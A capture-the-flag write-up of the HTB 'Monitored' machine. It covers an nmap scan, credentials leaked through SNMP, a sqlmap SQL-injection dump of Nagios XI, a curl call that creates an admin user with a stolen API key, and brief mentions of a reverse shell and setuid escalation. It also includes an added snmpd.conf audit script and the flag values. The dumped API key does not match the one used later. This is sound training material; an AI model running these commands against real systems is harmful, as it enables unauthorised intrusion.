HTB monitored

Writeup for HTB monitored box

rated: medium category: web

Nmap Scan

Starting Nmap 7.80 ( https://nmap.org ) at 2024-02-28 08:28 EAT


Warning: 10.10.11.248 giving up on port because retransmission cap hit (6).
Nmap scan report for monitored.htb (10.10.11.248)
Host is up (0.36s latency).
Not shown: 988 closed ports
PORT      STATE         SERVICE      VERSION
68/udp    open|filtered dhcpc
123/udp   open          ntp          NTP v4 (unsynchronized)
| ntp-info: 
|_  
161/udp   open          snmp         SNMPv1 server; net-snmp SNMPv3 server (public)
| snmp-info: 
|   enterprise: net-snmp
|   engineIDFormat: unknown
|   engineIDData: 6f3fa7421af94c6500000000
|   snmpEngineBoots: 35
|_  snmpEngineTime: 48m05s
| snmp-netstat: 
|   TCP  0.0.0.0:22           0.0.0.0:0
|   TCP  0.0.0.0:389          0.0.0.0:0
|   TCP  127.0.0.1:25         0.0.0.0:0
|_  UDP  0.0.0.0:68           *:*
| snmp-processes: 
|   1: 
| 
|   2: 
| 
|_  3: 
| snmp-sysdescr: Linux monitored 5.10.0-27-amd64 #1 SMP Debian 5.10.205-2 (2023-12-31) x86_64
|_  System uptime: 48m5.77s (288577 timeticks)
|_snmp-win32-software: 
162/udp   open          snmp         net-snmp; net-snmp SNMPv3 server
| snmp-info: 
|   enterprise: net-snmp
|   engineIDFormat: unknown
|   engineIDData: 5a44ab2146ff4c6500000000
|   snmpEngineBoots: 26
|_  snmpEngineTime: 48m05s
1100/udp  open|filtered mctp
1813/udp  open|filtered radacct
3130/udp  open|filtered squid-ipc
19500/udp open|filtered unknown
22053/udp open|filtered unknown
27444/udp open|filtered Trinoo_Bcast
44190/udp open|filtered unknown
49259/udp open|filtered unknown
Service Info: Host: monitored

Host script results:
|_clock-skew: 10s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 1302.38 seconds

SNMP enumeration

snmpwalk -v1 -c public  monitored.htb

The walk output gives us credentials: username svc, password XjH7VCehowpR1xZB
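
For the defensive side of this step, an added example (not part of the original writeup) that audits a net-snmp snmpd.conf for the exposure the scan shows: an SNMPv1 agent answering to the public community. The sample config, its community names and its addresses are constructed; the function name is hypothetical.

```python
import shlex

DEFAULT_COMMUNITIES = {"public", "private"}
ANY_SOURCE = {"default", "0.0.0.0/0", "::/0"}
# Constructed sample snmpd.conf for illustration; not taken from the box.
SAMPLE_CONF = """\
agentaddress udp:161
rocommunity public                       # v1/v2c read access, any host, whole tree
rocommunity Zq7-ro-example 10.0.5.20 -V systemonly
rwcommunity private default
com2sec readonly default public
rouser monitor authpriv                  # SNMPv3 user, not a community string
"""

def audit_snmpd_conf(text):
    """Return [(line_no, directive, [reasons])] for risky community directives."""
    findings = []
    for line_no, raw in enumerate(text.splitlines(), 1):
        tok = shlex.split(raw, comments=True)   # drops '#' comments
        if not tok:
            continue
        name, args = tok[0].lower(), tok[1:]
        if name in ("rocommunity", "rwcommunity", "rocommunity6", "rwcommunity6") and args:
            community = args[0]
            source = args[1] if len(args) > 1 else "default"   # omitted SOURCE = any host
            scoped = len(args) > 2                              # OID or -V VIEW given
        elif name == "com2sec":
            args = args[2:] if args[:1] == ["-Cn"] else args    # skip optional context
            if len(args) < 3:
                continue
            source, community = args[1], args[2]
            scoped = True      # com2sec views come from access/view lines, not checked here
        else:
            continue
        reasons = []
        if community.lower() in DEFAULT_COMMUNITIES:
            reasons.append("default community string")
        if source in ANY_SOURCE:
            reasons.append("no source restriction")
        if name.startswith("rw"):
            reasons.append("write access")
        if not scoped:
            reasons.append("whole MIB tree exposed")
        if reasons:
            findings.append((line_no, name, reasons))
    return findings

for line_no, name, reasons in audit_snmpd_conf(SAMPLE_CONF):
    print(f"line {line_no}: {name}: {', '.join(reasons)}")
```

A directive that combines a default community, no source restriction and no view is the configuration that lets any host walk the whole tree, as the scan above did.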

Making a POST request to /api/v1/authenticate returns an access token that we can use to log in


https://nagios.monitored.htb/nagiosxi/index.php?token=1562fdd66ece5a71f970399218ab842b6c8674c0

This Nagios XI instance is vulnerable to SQL injection (see here)

sqlmap -u "https://nagios.monitored.htb/nagiosxi/admin/banner_message-ajaxhelper.php" --data="id=3&action=acknowledge_banner_message" --cookie "nagiosxi=40ka0uvgngmjev8i267hq2qt9p" --dbms=MySQL --level=1 --risk=1 -D nagiosxi -T xi_users --dump

Dumping the database gives us an admin API key: IudGPHd9pEKiee9MkJ7ggPD89q3YndctnPeRQOmS2PQ7QIrbJEomFVG6Eut9CHLL

We can now create our own user with full privileges

curl -XPOST -k "https://nagios.monitored.htb/nagiosxi/api/v1/system/user?apikey=2huuT2u2QIPqFuJHnkPEEuibGJaJIcHCFDpDb29qSFVlbdO4HJkjfg2VpDNE3PEK&pretty=1" -d "username=test&password=test&name=test&email=test@test.com&auth_level=admin"

We upload a reverse shell by creating a command and checking it

user.txt 5428c0b228e51f2428525f3faa3fcca2

To escalate privileges we modify the setuid binary npcd

root.txt 9893d1d8c72bc11111a49fcb508ac07a

Licensed under CC BY-NC-SA 4.0